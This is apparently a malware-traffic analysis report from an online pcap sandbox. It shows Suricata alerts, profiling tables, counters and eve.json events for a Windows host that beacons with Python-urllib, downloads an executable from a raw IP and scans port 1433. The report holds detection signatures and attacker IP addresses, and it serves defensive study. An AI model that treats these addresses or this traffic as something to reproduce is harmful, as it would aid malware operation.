Filename: network.pcap
Status: Analysis complete
IDS: suricata-4.0.0
Ruleset: etopen-all
Runtime: 10.5597419739 seconds
Hash: cfcab331f081527fd30a5330ac5c8df5
Uploaded: 1561690507

Logfiles


unified2.alert.1561690515 - (12803 bytes) - download


suricata-4.0.0-etopen-all-alert-2019-06-28-T-02-55-17-04032019.1339-network.pcap.txt - (3352 bytes) - download
03/29/2019-09:49:34.388290  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49428 -> 79.98.145.42:80
03/29/2019-09:49:36.272085  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49429 -> 45.79.77.20:80
03/29/2019-09:49:36.699781  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49430 -> 153.92.4.49:80
03/29/2019-09:49:37.163101  [**] [1:2016141:5] ET INFO Executable Download from dotted-quad Host [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2013031:5] ET POLICY Python-urllib/ Suspicious User Agent [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.163101  [**] [1:2019714:10] ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49432 -> 27.102.130.126:80
03/29/2019-09:49:37.297976  [**] [1:2018959:3] ET POLICY PE EXE or DLL Windows file download HTTP [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:37.297976  [**] [1:2021076:2] ET INFO SUSPICIOUS Dotted Quad Host MZ Response [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:49:34.165698  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49687 -> 192.168.0.1:1433
03/29/2019-09:49:37.644459  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49688 -> 192.168.0.2:1433
03/29/2019-09:49:37.644675  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49689 -> 192.168.0.6:1433
03/29/2019-09:49:34.165907  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49690 -> 192.168.0.5:1433
03/29/2019-09:49:34.165925  [**] [1:2010935:3] ET SCAN Suspicious inbound to MSSQL port 1433 [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 192.168.240.16:49691 -> 192.168.0.3:1433
03/29/2019-09:49:37.689490  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:49719 -> 192.168.0.52:1433
03/29/2019-09:49:38.528631  [**] [1:2015744:4] ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) [**] [Classification: Misc activity] [Priority: 3] {TCP} 27.102.130.126:80 -> 192.168.240.16:49432
03/29/2019-09:50:33.979260  [**] [1:2001583:16] ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection [**] [Classification: Misc activity] [Priority: 3] {TCP} 192.168.240.16:52365 -> 8.8.8.62:1433


packet_stats.log - (17616 bytes) - download
Packet profile dump:

IP ver   Proto   cnt            min            max            avg            tot           %% 
------   -----   ----------     ------------   ------------   -----------    -----------   ---
 IPv4       1             3       2236831542     2249120224    2240949128          6.7b    0.02
 IPv4       6         16826          6391458     2456743916    1885293390      31721.9b   99.89
 IPv4      17            51          1541152     2399959712     557661025         28.4b    0.09
 IPv6      17            17          1740684       48609844      19976409        339.6m    0.00
Note: Protocol 256 tracks pseudo/tunnel packets.

Per Thread module stats:

Thread Module              IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---
TMM_FLOWWORKER              IPv4       1             3            73941          89199         83432        250.3k    0.01
TMM_FLOWWORKER              IPv4       6         16826            66174       16344471        196548          3.3b   95.01
TMM_FLOWWORKER              IPv4      17            51           150199       13914019        798088         40.7m    1.17
TMM_RECEIVEPCAPFILE         IPv4       1             3             2891           3302          3042          9.1k    0.00
TMM_RECEIVEPCAPFILE         IPv4       6         16825             2532        5754512          3332         56.1m    1.61
TMM_RECEIVEPCAPFILE         IPv4      17            51             2553          14132          3341        170.4k    0.00
TMM_DECODEPCAPFILE          IPv4       1             3             3120          12779          6900         20.7k    0.00
TMM_DECODEPCAPFILE          IPv4       6         16825             2648        9617146          4185         70.4m    2.02
TMM_DECODEPCAPFILE          IPv4      17            51             2683          36707          4016        204.8k    0.01
TMM_FLOWWORKER              IPv6      17            17           186502        2403388        345882          5.9m    0.17
TMM_RECEIVEPCAPFILE         IPv6      17            17             2857           3647          3239         55.1k    0.00
TMM_DECODEPCAPFILE          IPv6      17            17             2695          21224          4302         73.1k    0.00

Flow Worker            IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
flow                    IPv4       1             1             3435           3435          3435          3.4k  0.00  
flow                    IPv4       6         16825             2818         121273          4361         73.4m  2.41  
flow                    IPv4      17            51             2881          40073          5511        281.1k  0.01  
stream                  IPv4       6         16826             2571        2683559          4998         84.1m  2.76  
app-layer               IPv4      17            51             2536          35211         11027        562.4k  0.02  
detect                  IPv4       1             3            68361          83592         75576        226.7k  0.01  
detect                  IPv4       6         16826            44660       16305613        166500          2.8b  92.02 
detect                  IPv4      17            51           133963       13886539        536624         27.4m  0.90  
tcp-prune               IPv4       6         16826             2529         430655          3056         51.4m  1.69  
flow                    IPv6      17            17             2787           5935          3828         65.1k  0.00  
app-layer               IPv6      17            17             2538          10716          4113         69.9k  0.00  
detect                  IPv6      17            17           168181        2381438        325666          5.5m  0.18  
Note: stream includes app-layer for TCP

Per App layer parser stats:

App Layer              IP ver   Proto   cnt            min            max            avg         
--------------------   ------   -----   ----------     ------------   ------------   ----------- 
http                    IPv4       6            11             4911          54345         17338        190.7k  54.25 
http                    IPv4      17             2             7052           7960          7506         15.0k  4.27  
tls                     IPv4       6             2             2926           6828          4877          9.8k  2.77  
dns                     IPv4      17            16             4855          21184          8505        136.1k  38.71 
Proto detect            IPv4       6             1            48489          48489         48489         48.5k
Proto detect            IPv4      17            24             5106          27721          8678        208.3k
Proto detect            IPv6      17             3             3122           4376          3886         11.7k

Log Thread Module          IP ver   Proto   cnt            min            max            avg            tot           %% 
------------------------   ------   -----   ----------     ------------   ------------   -----------    -----------   ---

Logger/output stats:

Logger                     IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
LOGGER_ALERT_FAST           IPv4       6            13             9918          96419         48645        632.4k  3.72  
LOGGER_UNIFIED2             IPv4       6            13            17141         120251         50502        656.5k  3.86  
LOGGER_JSON_ALERT           IPv4       6            13            29295         167163         78317          1.0m  5.98  
LOGGER_JSON_DNS             IPv4      17            16            34423       10551907        730074         11.7m  68.63 
LOGGER_JSON_HTTP            IPv4       6            14            43172         243098         85853          1.2m  7.06  
LOGGER_JSON_TLS             IPv4       6             1            98484          98484         98484         98.5k  0.58  
LOGGER_JSON_FILE            IPv4       6            14            63118         250597        123792          1.7m  10.18 

Prefilter                        IP ver   Proto   cnt            min            max            avg            tot          %% 
--------------------             ------   -----   ----------     ------------   ------------   -----------    ---------    ---
payload                           IPv4       1             3             4141          13833          9828        29.5k  0.01  
payload                           IPv4       6          1832             2733         432728         24951        45.7m  13.83 
payload                           IPv4      17            51             4971         108651         34069         1.7m  0.53  
stream                            IPv4       6          1832             2541        7195911         40215        73.7m  22.29 
http_uri                          IPv4       6            14             5025          53604         16019       224.3k  0.07  
http_request_line                 IPv4       6            14             4211          10147          6382        89.3k  0.03  
http_client_body                  IPv4       6            14             3050          66122         21565       301.9k  0.09  
http_header (request)             IPv4       6            14            12007          71132         34724       486.1k  0.15  
http_header (request trailer)     IPv4       6            14             2631           3772          3011        42.2k  0.01  
http_header_names (request)       IPv4       6            14             6799          27884         16219       227.1k  0.07  
http_accept (request)             IPv4       6            14             2982           5557          4259        59.6k  0.02  
http_referer (request)            IPv4       6            14             2860           4324          3507        49.1k  0.01  
http_content_len (request)        IPv4       6            14             2882           6697          4065        56.9k  0.02  
http_content_type (request)       IPv4       6            14             2868          51201          7716       108.0k  0.03  
http_start (request)              IPv4       6            14             5345          12338          9000       126.0k  0.04  
http_raw_header (request)         IPv4       6            14             7596          14618         10014       140.2k  0.04  
http_method                       IPv4       6            14             2985          34007          6984        97.8k  0.03  
http_cookie (request)             IPv4       6            14             2851           4900          3696        51.8k  0.02  
http_raw_uri                      IPv4       6            14             2704           6240          4732        66.3k  0.02  
http_user_agent                   IPv4       6            14             2971          11801          5993        83.9k  0.03  
http_host                         IPv4       6            14             3413           9018          5279        73.9k  0.02  
dns_query                         IPv4      17             8             5518          11420          8591        68.7k  0.02  
tls_sni                           IPv4       6             1             3176           3176          3176         3.2k  0.00  
http_response_line                IPv4       6            14             3910           9999          7500       105.0k  0.03  
http_header (response)            IPv4       6            14            13575          61496         33263       465.7k  0.14  
http_header (response trailer)    IPv4       6            14             2618           3418          2956        41.4k  0.01  
http_content_type (response)      IPv4       6            14             3206           9276          4493        62.9k  0.02  
http_raw_header (response)        IPv4       6          1771             4058         156277          5087         9.0m  2.73  
http_cookie (response)            IPv4       6            14             2908          10604          4017        56.2k  0.02  
http_stat_code                    IPv4       6            14             3385           5741          4477        62.7k  0.02  
tls_cert_issuer                   IPv4       6             1             8684           8684          8684         8.7k  0.00  
tls_cert_subject                  IPv4       6             1             7820           7820          7820         7.8k  0.00  
tls_cert_serial                   IPv4       6             1             7118           7118          7118         7.1k  0.00  
file_data (http response)         IPv4       6          1771             2570       15516895        111192       196.9m  59.57 
Total                             IPv4                  7594                                         43489       330.3m
payload                           IPv6      17            17             9734          70963         17708       301.0k  0.09  
Total                             IPv6                    17                                         17708       301.0k

General detection engine stats:

Detection phase            IP ver   Proto   cnt            min            max            avg            tot         
------------------------   ------   -----   ----------     ------------   ------------   -----------    ----------- 
PROF_DETECT_IPONLY          IPv4       1             3             4194          16739          9751         29.3k  0.00  
PROF_DETECT_IPONLY          IPv4       6         13026             3211       14262567         25839        336.6m  12.06 
PROF_DETECT_IPONLY          IPv4      17            26             9543          83778         32998        858.0k  0.03  
PROF_DETECT_RULES           IPv4       1             3             2542           2568          2557          7.7k  0.00  
PROF_DETECT_RULES           IPv4       6         16826             2530       11677903         48245        811.8m  29.07 
PROF_DETECT_RULES           IPv4      17            51            71020         462296        136038          6.9m  0.25  
PROF_DETECT_STATEFUL_START    IPv4       6          1553             5114        6621970         28411         44.1m  1.58  
PROF_DETECT_STATEFUL_CONT    IPv4       1             3             2560           3173          2818          8.5k  0.00  
PROF_DETECT_STATEFUL_CONT    IPv4       6         16826             2500        6623338          7275        122.4m  4.38  
PROF_DETECT_STATEFUL_CONT    IPv4      17            51             2579          37777          4780        243.8k  0.01  
PROF_DETECT_STATEFUL_UPDATE    IPv4       6          2867             2565          62392          3177          9.1m  0.33  
PROF_DETECT_STATEFUL_UPDATE    IPv4      17            16             2698           4272          3272         52.4k  0.00  
PROF_DETECT_PREFILTER       IPv4       1             3            19968          30039         25779         77.3k  0.00  
PROF_DETECT_PREFILTER       IPv4       6         16826             7701       15641370         34348        577.9m  20.70 
PROF_DETECT_PREFILTER       IPv4      17            51            26357         135812         62345          3.2m  0.11  
PROF_DETECT_PF_PAYLOAD      IPv4       1             3             9458          18904         14979         44.9k  0.00  
PROF_DETECT_PF_PAYLOAD      IPv4       6          1832            14120        7221024         74163        135.9m  4.87  
PROF_DETECT_PF_PAYLOAD      IPv4      17            51            10278         114591         40234          2.1m  0.07  
PROF_DETECT_PF_TX           IPv4       6          2867             2573       15535741         84826        243.2m  8.71  
PROF_DETECT_PF_TX           IPv4      17             8            11357          18028         14907        119.3k  0.00  
PROF_DETECT_PF_SORT1        IPv4       6          1241             2529          43927          3636          4.5m  0.16  
PROF_DETECT_PF_SORT1        IPv4      17            51             2833           5851          4144        211.4k  0.01  
PROF_DETECT_PF_SORT2        IPv4       1             3             2539           2599          2560          7.7k  0.00  
PROF_DETECT_PF_SORT2        IPv4       6         16826             2514        4624715          3326         56.0m  2.00  
PROF_DETECT_PF_SORT2        IPv4      17            51             2555           4787          3336        170.2k  0.01  
PROF_DETECT_NONMPMLIST      IPv4       1             3             2761           2811          2782          8.3k  0.00  
PROF_DETECT_NONMPMLIST      IPv4       6         16826             2527        6266657          3516         59.2m  2.12  
PROF_DETECT_NONMPMLIST      IPv4      17            51             2632           4413          3280        167.3k  0.01  
PROF_DETECT_ALERT           IPv4       1             3             2553           2592          2571          7.7k  0.00  
PROF_DETECT_ALERT           IPv4       6         16826             2523        6712136         11728        197.3m  7.07  
PROF_DETECT_ALERT           IPv4      17            51             2525          15551          3294        168.0k  0.01  
PROF_DETECT_CLEANUP         IPv4       1             3             2510           2678          2582          7.7k  0.00  
PROF_DETECT_CLEANUP         IPv4       6         16826             2544        6138051          4019         67.6m  2.42  
PROF_DETECT_CLEANUP         IPv4      17            51             2527           5907          3485        177.7k  0.01  
PROF_DETECT_GETSGH          IPv4       1             3             2750           2836          2795          8.4k  0.00  
PROF_DETECT_GETSGH          IPv4       6         16826             2518       16210252          6425        108.1m  3.87  
PROF_DETECT_GETSGH          IPv4      17            51             2687          16359          6064        309.3k  0.01  
PROF_DETECT_IPONLY          IPv6      17             3             7378           8364          7783         23.4k  0.00  

This file has been truncated.


suricata-4.0.0-etopen-all-perf.txt-2019-06-28-T-02-55-17-04032019.1339-network.pcap.txt - (37078 bytes) - download
  --------------------------------------------------------------------------
  Date: 6/28/2019 -- 02:55:17. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2010935      1        3        150340955    24.09  13784    6699     11642478    10906.92    19395.43    2880.87    
  2        2019345      1        2        10609345     1.70   234      0        6949644     45339.08    0.00        45339.08   
  3        2022547      1        1        7533973      1.21   255      0        6684034     29544.99    0.00        29544.99   
  4        2020865      1        3        30825712     4.94   180      0        6633343     171253.96   0.00        171253.96  
  5        2024771      1        1        18289957     2.93   1758     0        6587857     10403.84    0.00        10403.84   
  6        2102523      1        8        47343573     7.59   13806    0        6584928     3429.20     0.00        3429.20    
  7        2020569      1        1        7533750      1.21   15       0        6560779     502250.00   0.00        502250.00  
  8        2001583      1        16       212574183    34.06  13784    13784    6305011     15421.81    15421.81    0.00       
  9        2016502      1        2        4593630      0.74   161      0        2074589     28531.86    0.00        28531.86   
  10       2018982      1        2        1075349      0.17   15       0        409694      71689.93    0.00        71689.93   
  11       2022050      1        3        955869       0.15   15       0        328817      63724.60    0.00        63724.60   
  12       2021749      1        6        255180       0.04   6        0        240619      42530.00    0.00        42530.00   
  13       2018789      1        3        379269       0.06   6        0        203914      63211.50    0.00        63211.50   
  14       2016855      1        2        438259       0.07   11       0        196565      39841.73    0.00        39841.73   
  15       2016854      1        3        395790       0.06   11       0        156315      35980.91    0.00        35980.91   
  16       2021586      1        3        154408       0.02   1        0        154408      154408.00   0.00        154408.00  
  17       2018316      1        4        219814       0.04   3        0        139353      73271.33    0.00        73271.33   
  18       2021434      1        2        133776       0.02   1        0        133776      133776.00   0.00        133776.00  
  19       2021432      1        2        133117       0.02   1        0        133117      133117.00   0.00        133117.00  
  20       2021433      1        2        127320       0.02   1        0        127320      127320.00   0.00        127320.00  
  21       2014819      1        3        210652       0.03   3        0        122220      70217.33    0.00        70217.33   
  22       2012981      1        5        177569       0.03   3        0        115599      59189.67    0.00        59189.67   
  23       2008575      1        5        16994729     2.72   1784     0        104864      9526.19     0.00        9526.19    
  24       2023476      1        5        102184       0.02   1        0        102184      102184.00   0.00        102184.00  
  25       2016537      1        2        16488355     2.64   1032     1        100280      15977.09    69069.00    15925.59   
  26       2024650      1        1        4300184      0.69   266      0        99232       16166.11    0.00        16166.11   
  27       2017552      1        6        16175732     2.59   1045     0        90560       15479.17    0.00        15479.17   
  28       2016112      1        3        3054121      0.49   177      0        84108       17254.92    0.00        17254.92   
  29       2019714      1        10       79560        0.01   1        1        79560       79560.00    79560.00    0.00       
  30       2021954      1        2        958274       0.15   60       0        71016       15971.23    0.00        15971.23   
  31       2018005      1        6        87607        0.01   6        0        70847       14601.17    0.00        14601.17   
  32       2016141      1        5        70745        0.01   1        1        70745       70745.00    70745.00    0.00       
  33       2001330      1        8        5636304      0.90   1732     0        70572       3254.22     0.00        3254.22    
  34       2021702      1        1        292911       0.05   64       0        69690       4576.73     0.00        4576.73    
  35       2018241      1        2        288615       0.05   60       0        69130       4810.25     0.00        4810.25    
  36       2024777      1        2        1050685      0.17   309      0        68631       3400.28     0.00        3400.28    
  37       2024769      1        2        68467        0.01   1        0        68467       68467.00    0.00        68467.00   
  38       2008303      1        3        274163       0.04   66       0        68389       4153.98     0.00        4153.98    
  39       2015744      1        4        101629       0.02   12       1        67155       8469.08     67155.00    3134.00    
  40       2020661      1        3        506983       0.08   118      0        65266       4296.47     0.00        4296.47    
  41       2018959      1        3        253673       0.04   60       1        64473       4227.88     64473.00    3206.78    
  42       2025142      1        2        220608       0.04   4        0        63494       55152.00    0.00        55152.00   
  43       2018382      1        8        324696       0.05   66       0        61707       4919.64     0.00        4919.64    
  44       2021312      1        2        970882       0.16   60       0        58197       16181.37    0.00        16181.37   
  45       2024909      1        2        2867238      0.46   130      0        58097       22055.68    0.00        22055.68   
  46       2018464      1        4        956563       0.15   60       0        57163       15942.72    0.00        15942.72   
  47       2022482      1        3        56933        0.01   1        0        56933       56933.00    0.00        56933.00   
  48       2022552      1        2        4757784      0.76   215      0        56871       22129.23    0.00        22129.23   
  49       2009897      1        14       100943       0.02   15       0        56575       6729.53     0.00        6729.53    
  50       2019155      1        2        150052       0.02   4        0        54973       37513.00    0.00        37513.00   
  51       2024829      1        2        3639726      0.58   160      0        54844       22748.29    0.00        22748.29   
  52       2014353      1        6        249260       0.04   60       0        54531       4154.33     0.00        4154.33    
  53       2013352      1        4        241860       0.04   60       0        54303       4031.00     0.00        4031.00    
  54       2008438      1        20       723607       0.12   15       0        53599       48240.47    0.00        48240.47   
  55       2022653      1        2        932120       0.15   60       0        53470       15535.33    0.00        15535.33   
  56       2014473      1        5        3145987      0.50   198      0        53016       15888.82    0.00        15888.82   
  57       2017190      1        6        52724        0.01   1        0        52724       52724.00    0.00        52724.00   
  58       2023671      1        4        951516       0.15   60       0        52089       15858.60    0.00        15858.60   
  59       2016143      1        3        2602372      0.42   147      0        50215       17703.21    0.00        17703.21   
  60       2022896      1        5        49103        0.01   1        0        49103       49103.00    0.00        49103.00   
  61       2019103      1        4        981283       0.16   60       0        48329       16354.72    0.00        16354.72   
  62       2019165      1        3        936463       0.15   60       0        48081       15607.72    0.00        15607.72   
  63       2022502      1        4        207340       0.03   5        0        47600       41468.00    0.00        41468.00   
  64       2018121      1        4        46992        0.01   1        0        46992       46992.00    0.00        46992.00   
  65       2017748      1        6        3207679      0.51   198      0        46222       16200.40    0.00        16200.40   
  66       2022535      1        11       46220        0.01   1        0        46220       46220.00    0.00        46220.00   
  67       2021067      1        2        164185       0.03   4        0        45981       41046.25    0.00        41046.25   
  68       2017114      1        5        45837        0.01   1        0        45837       45837.00    0.00        45837.00   
  69       2022051      1        2        905792       0.15   60       0        45734       15096.53    0.00        15096.53   
  70       2013441      1        9        90428        0.01   15       0        45625       6028.53     0.00        6028.53    
  71       2009909      1        10       92647        0.01   15       0        45580       6176.47     0.00        6176.47    
  72       2020573      1        2        44436        0.01   1        1        44436       44436.00    44436.00    0.00       
  73       2020421      1        2        938085       0.15   60       0        44403       15634.75    0.00        15634.75   
  74       2014471      1        6        43890        0.01   1        0        43890       43890.00    0.00        43890.00   
  75       2018581      1        3        43249        0.01   1        0        43249       43249.00    0.00        43249.00   
  76       2024848      1        2        167087       0.03   4        0        43079       41771.75    0.00        41771.75   
  77       2022627      1        12       43067        0.01   1        0        43067       43067.00    0.00        43067.00   
  78       2014288      1        2        42870        0.01   1        0        42870       42870.00    0.00        42870.00   
  79       2022609      1        2        182458       0.03   5        0        42103       36491.60    0.00        36491.60   
  80       2009028      1        11       225193       0.04   60       0        41787       3753.22     0.00        3753.22    
  81       2017295      1        6        41257        0.01   1        0        41257       41257.00    0.00        41257.00   
  82       2022334      1        2        155596       0.02   5        0        41008       31119.20    0.00        31119.20   
  83       2016503      1        2        2466905      0.40   161      0        40847       15322.39    0.00        15322.39   
  84       2012969      1        2        40653        0.01   1        0        40653       40653.00    0.00        40653.00   
  85       2022658      1        4        39783        0.01   1        0        39783       39783.00    0.00        39783.00   
  86       2014701      1        12       243543       0.04   16       0        39588       15221.44    0.00        15221.44   
  87       2021068      1        2        39499        0.01   1        1        39499       39499.00    39499.00    0.00       
  88       2016029      1        3        39337        0.01   1        0        39337       39337.00    0.00        39337.00   
  89       2015547      1        4        39222        0.01   1        0        39222       39222.00    0.00        39222.00   
  90       2017693      1        2        39186        0.01   1        0        39186       39186.00    0.00        39186.00   
  91       2022830      1        2        38970        0.01   1        0        38970       38970.00    0.00        38970.00   
  92       2018403      1        10       38867        0.01   1        0        38867       38867.00    0.00        38867.00   
  93       2021775      1        2        38663        0.01   1        0        38663       38663.00    0.00        38663.00   
  94       2019230      1        2        197599       0.03   14       0        38459       14114.21    0.00        14114.21   
  95       2018375      1        3        1062436      0.17   66       0        38148       16097.52    0.00        16097.52   
  96       2020742      1        1        100544       0.02   3        0        38017       33514.67    0.00        33514.67   
  97       2018666      1        4        107966       0.02   3        0        37393       35988.67    0.00        35988.67   
  98       2016097      1        4        37050        0.01   1        0        37050       37050.00    0.00        37050.00   
  99       2011457      1        8        36631        0.01   1        0        36631       36631.00    0.00        36631.00   
  100      2020741      1        1        103292       0.02   3        0        36617       34430.67    0.00        34430.67   
  101      2022270      1        2        36234        0.01   1        0        36234       36234.00    0.00        36234.00   
  102      2022942      1        2        36223        0.01   1        0        36223       36223.00    0.00        36223.00   
  103      2022804      1        2        35963        0.01   1        0        35963       35963.00    0.00        35963.00   
  104      2021245      1        6        35568        0.01   1        0        35568       35568.00    0.00        35568.00   
  105      2021076      1        2        220495       0.04   60       1        35465       3674.92     35465.00    3136.10    
  106      2023626      1        3        219335       0.04   60       0        35226       3655.58     0.00        3655.58    
  107      2024775      1        1        355391       0.06   96       0        35019       3701.99     0.00        3701.99    
  108      2020826      1        7        34515        0.01   1        0        34515       34515.00    0.00        34515.00   
  109      2020941      1        2        34484        0.01   1        0        34484       34484.00    0.00        34484.00   
  110      2022197      1        3        131095       0.02   4        0        34425       32773.75    0.00        32773.75   
  111      2014913      1        2        34035        0.01   1        0        34035       34035.00    0.00        34035.00   
  112      2016578      1        5        33812        0.01   1        0        33812       33812.00    0.00        33812.00   
  113      2022940      1        2        33794        0.01   1        0        33794       33794.00    0.00        33794.00   
  114      2023679      1        3        916997       0.15   60       0        33684       15283.28    0.00        15283.28   
  115      2009549      1        6        33428        0.01   1        0        33428       33428.00    0.00        33428.00   
  116      2023083      1        2        33382        0.01   1        0        33382       33382.00    0.00        33382.00   
  117      2013031      1        5        123348       0.02   4        4        32907       30837.00    30837.00    0.00       
  118      2017669      1        5        32692        0.01   1        1        32692       32692.00    32692.00    0.00       
  119      2022550      1        16       32478        0.01   1        0        32478       32478.00    0.00        32478.00   
  120      2013036      1        7        32143        0.01   1        0        32143       32143.00    0.00        32143.00   
  121      2018421      1        2        31522        0.01   1        0        31522       31522.00    0.00        31522.00   
  122      2013037      1        7        31384        0.01   1        0        31384       31384.00    0.00        31384.00   
  123      2018928      1        3        31236        0.01   1        0        31236       31236.00    0.00        31236.00   
  124      2018457      1        1        42677        0.01   4        0        31073       10669.25    0.00        10669.25   
  125      2018556      1        2        3

This file has been truncated.


stats.log - (3245 bytes)
------------------------------------------------------------------------------------
Date: 6/28/2019 -- 02:55:17 (uptime: 0d, 00h 00m 02s)
------------------------------------------------------------------------------------
Counter                                    | TM Name                   | Value
------------------------------------------------------------------------------------
decoder.pkts                               | Total                     | 17667
decoder.bytes                              | Total                     | 3740503
decoder.ipv4                               | Total                     | 16879
decoder.ipv6                               | Total                     | 17
decoder.ethernet                           | Total                     | 17667
decoder.tcp                                | Total                     | 16825
decoder.udp                                | Total                     | 68
decoder.icmpv4                             | Total                     | 3
decoder.avg_pkt_size                       | Total                     | 211
decoder.max_pkt_size                       | Total                     | 1514
flow.tcp                                   | Total                     | 12925
flow.udp                                   | Total                     | 21
tcp.sessions                               | Total                     | 12921
tcp.syn                                    | Total                     | 13802
tcp.synack                                 | Total                     | 14
tcp.rst                                    | Total                     | 110
tcp.overlap                                | Total                     | 4
detect.alert                               | Total                     | 16
detect.nonmpm_list                         | Total                     | 5
detect.fnonmpm_list                        | Total                     | 2
detect.match_list                          | Total                     | 3
app_layer.flow.http                        | Total                     | 11
app_layer.tx.http                          | Total                     | 14
app_layer.flow.tls                         | Total                     | 1
app_layer.flow.dns_udp                     | Total                     | 8
app_layer.tx.dns_udp                       | Total                     | 8
app_layer.flow.failed_udp                  | Total                     | 13
flow_mgr.new_pruned                        | Total                     | 12
flow.spare                                 | Total                     | 9982
flow_mgr.flows_checked                     | Total                     | 3678
flow_mgr.flows_notimeout                   | Total                     | 3678
flow_mgr.rows_checked                      | Total                     | 65536
flow_mgr.rows_skipped                      | Total                     | 62049
flow_mgr.rows_maxlen                       | Total                     | 4
tcp.memuse                                 | Total                     | 573440
tcp.reassembly_memuse                      | Total                     | 81920
flow.memuse                                | Total                     | 8682496


eve.json - (27462 bytes)
{"timestamp":"2019-03-29T09:47:38.758657+0000","flow_id":1289481952596865,"pcap_cnt":31,"event_type":"dns","src_ip":"192.168.240.16","src_port":62683,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":2207,"rrname":"acroipm2.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:40.827629+0000","flow_id":2169537931550957,"pcap_cnt":32,"event_type":"dns","src_ip":"192.168.240.16","src_port":63759,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":13503,"rrname":"armmf.corp.adobe.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":2169537931550957,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"armmf.corp.adobe.com"}}
{"timestamp":"2019-03-29T09:47:38.776667+0000","flow_id":2169537931550957,"pcap_cnt":33,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":63759,"proto":"UDP","dns":{"type":"answer","id":13503,"rcode":"NXDOMAIN","rrname":"adobe.com","rrtype":"SOA","ttl":133}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com","rrtype":"CNAME","ttl":2639,"rdata":"acroipm2.adobe.com.edgesuite.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"acroipm2.adobe.com.edgesuite.net","rrtype":"CNAME","ttl":21032,"rdata":"a122.g2.akamai.net"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.145"}}
{"timestamp":"2019-03-29T09:47:38.793751+0000","flow_id":1289481952596865,"pcap_cnt":34,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"192.168.240.16","dest_port":62683,"proto":"UDP","dns":{"type":"answer","id":2207,"rcode":"NOERROR","rrname":"a122.g2.akamai.net","rrtype":"A","ttl":19,"rdata":"204.237.142.136"}}
{"timestamp":"2019-03-29T09:47:38.928936+0000","flow_id":1301013939907171,"pcap_cnt":45,"event_type":"http","src_ip":"192.168.240.16","src_port":49425,"dest_ip":"204.237.142.145","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"acroipm2.adobe.com","url":"\/18\/rdr\/ENU\/win\/nooem\/none\/consumer\/278_18_11_20038.zip","http_user_agent":"IPM","http_content_type":"application\/zip"}}
